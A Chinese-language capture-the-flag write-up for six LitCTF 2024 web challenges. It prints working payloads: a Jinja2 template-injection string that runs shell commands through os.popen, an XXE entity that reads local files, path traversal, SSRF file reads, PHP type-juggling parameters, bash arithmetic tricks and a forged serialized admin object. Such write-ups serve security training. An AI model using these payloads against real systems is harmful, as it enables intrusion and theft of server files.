当前位置:   article > 正文

【Web】LitCTF 2024 题解(全)

【Web】LitCTF 2024 题解(全)

目录

浏览器也能套娃?

一个....池子? 

高亮主题(划掉)背景查看器 

百万美元的诱惑

SAS - Serializing Authentication

exx


浏览器也能套娃?

随便试一试,一眼ssrf

 file:///flag直接读本地文件

一个....池子? 

{{7*7}}测出SSTI

随便找个payload打了

{{x.__init__.__globals__['__builtins__']['eval']("__import__('os').popen('tac /f*').read()")}}

高亮主题(划掉)背景查看器 

一眼文件包含漏洞

../../../../flag

目录穿越拿到flag

 

百万美元的诱惑

?a[]=1&b[]=2&c=2025.a

过了php八股 

访问./dollar.php

参考ctfshow web57

【Web】CTFSHOW PHP命令执行刷题记录(全)_ctfweb解题 php-CSDN博客 

  1. 0=$(())
  2. 12=$((~$((-13))))
  3. -13=$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))
  4. 12=$((~$(($((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))))))

 

SAS - Serializing Authentication

傻瓜题

  1. <?php
  2. class User {
  3. public $username;
  4. public $password;
  5. }
  6. $user=new User();
  7. $user->username='admin';
  8. $user->password='secure_password';
  9. echo base64_encode(serialize($user));
  10. ?>

exx

以xml形式传数据,打xxe

 直接读文件

  1. <!DOCTYPE test [
  2. <!ENTITY xxe SYSTEM "file:///flag">
  3. ]>
  4. <user><username>&xxe;</username><password>admin</password></user>

 

本文内容由网友自发贡献,转载请注明出处:【wpsshop博客】
推荐阅读
相关标签
  

闽ICP备14008679号